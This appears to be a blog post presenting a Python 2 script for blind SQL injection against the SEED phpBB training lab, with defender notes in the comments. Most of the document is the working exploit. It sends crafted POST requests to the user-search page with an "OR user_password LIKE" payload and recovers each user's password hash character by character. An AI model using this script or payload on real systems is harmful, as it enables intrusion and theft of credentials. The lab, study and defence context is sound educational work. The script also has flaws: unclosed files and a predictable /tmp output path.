These are great labs to learn more about cyber security and penetration testing.
The script below was developed to demonstrate SQL injection on the phpBB lab that they provide. Though the lab itself does not require this, it was a great script to write. With the script I extract the passwords for the 5 users that are found on the system.
This script could be made more efficient by replacing the brute force of each letter with conditional statements.
#!/usr/bin/env python
"""Boolean-based blind SQL injection demonstration against the SEED phpBB lab.

Python 2 script (``print`` statement, ``send`` of a ``str``).  For each account
in ``userNames`` it recovers the stored password *hash* one character at a
time: each probe asks the user-search page whether the hash begins with the
prefix recovered so far plus one more candidate character, and the answer is
read off whether that user's name shows up in the returned page.

Defender's notes:
  * The injected form value (``searchRequest8`` below) decodes to
    ``4' OR user_password LIKE '<prefix>%`` in the ``search_username`` field.
    That only works if the search handler pastes the field straight into its
    SQL string (the lab's deliberate flaw); parameterised queries / prepared
    statements close the hole regardless of what the field contains.
  * The traffic signature is distinctive: up to 29 positions x 36 candidates
    of sequential POSTs to ``search.php?mode=searchuser`` per user, each body
    differing by one character and containing ``OR`` and ``LIKE``.  That is
    the pattern a WAF rule or web-log review would key on.
  * Only the hash leaks, not the plaintext password.
"""
import os               # unused in this script
import re               # unused in this script
from socket import *    # provides socket, AF_INET, SOCK_STREAM
from time import ctime  # unused in this script

BUFSIZE=1024  # bytes requested per recv() call

# Change the hostInput based on your IP Address of the SEED Installation of Ubuntu 9.
hostInput = '172.16.108.140'
# Accounts whose hashes are extracted; shorten the list to probe a single user.
userNames = ['admin', 'alice', 'bob', 'carol', 'ted']
#userNames = ['ted']
userPassword = ''  # hash prefix recovered so far for the current user
# 63 is the length of the fixed part of the POST body (everything except the
# prefix and the candidate letter); the trailing "\n\n\n" is not counted.
# It is never modified, so the reset at the bottom of the outer loop is a no-op.
contentLength = 63

for userName in userNames:
    # `number` is the 1-based position in the hash being recovered; 29 positions
    # are attempted, so a longer hash would be truncated.
    for number in range(1,30):
        # Content-Length = 63 + len(prefix) + 1 candidate, assuming the prefix
        # has exactly number-1 characters at this point.
        contentLengthTotal = contentLength + number
        # Candidate alphabet: lower-case letters and digits only, so a hash
        # containing any other character would stop extending here.
        for letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
            # One fresh TCP connection per probe; the request is hand-built HTTP/1.1.
            tcpServerSocket = socket(AF_INET, SOCK_STREAM)
            remoteServer = (hostInput, 80)
            tcpServerSocket.connect(remoteServer)
            # Header lines end in a bare "\n" rather than the "\r\n" HTTP specifies;
            # the script relies on the server being lenient about that.
            searchRequest1 = "POST http://www.sqllabmysqlphpbb.com/search.php?mode=searchuser HTTP/1.1\n"
            searchRequest2 = "Host: www.sqllabmysqlphpbb.com\n"
            searchRequest3 = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1\n"
            searchRequest5 = "Accept-Language: en-US,en;q=0.5\n"
            searchRequest6 = "Content-Type: application/x-www-form-urlencoded\n"
            searchRequest7 = "Content-Length: " + str(contentLengthTotal) + "\n\n"
            # The injected predicate.  URL-decoded the field is
            #   4' OR user_password LIKE '<userPassword><letter>%
            # so the result page lists every user whose hash starts with that prefix.
            searchRequest8 = "search_username=4%27+OR+user_password+LIKE+%27" + userPassword + letter + "%25&search=Search\n\n\n"
            # There is no searchRequest4; the numbering gap is harmless.
            searchRequest = searchRequest1 + searchRequest2 + searchRequest3 + searchRequest5 + searchRequest6 + searchRequest7 + searchRequest8
            #print searchRequest
            # NOTE: send() does not guarantee the whole buffer is written in one call.
            tcpServerSocket.send(searchRequest)
            # Response is spooled to a fixed, predictable path in /tmp (a classic
            # symlink/race hazard on shared hosts); the file is rewritten per probe.
            f = open('/tmp/output', 'w')
            initialLength = 0
            # Read until EOF or 14 recv() chunks (at most 14 * BUFSIZE bytes),
            # whichever comes first; anything after that is discarded.
            while True:
                pageReturned = tcpServerSocket.recv(BUFSIZE)
                if not pageReturned:
                    break
                #print pageReturned
                initialLength = initialLength + 1
                f.write(pageReturned)
                if initialLength == 14:
                    break
            # NOTE: f.closed only reads a boolean attribute; it does not close the file.
            f.closed
            tcpServerSocket.close()
            # Re-read the spooled page and look for the <option> entry the search
            # results emit for this user; its presence means the LIKE matched.
            f = open('/tmp/output', 'r')
            userNameInFile = '<option value="' + userName + '">'
            for line in f:
                if userNameInFile in line:
                    userPassword = userPassword + letter
            # NOTE: same as above, this does not close the file.
            f.closed
    # Python 2 print statement; what is recovered is the stored hash, not a plaintext password.
    print "The hash stored as the password for " + userName + " is " + userPassword
    # Reset the prefix for the next account.  contentLength was never changed.
    userPassword = ''
    contentLength = 63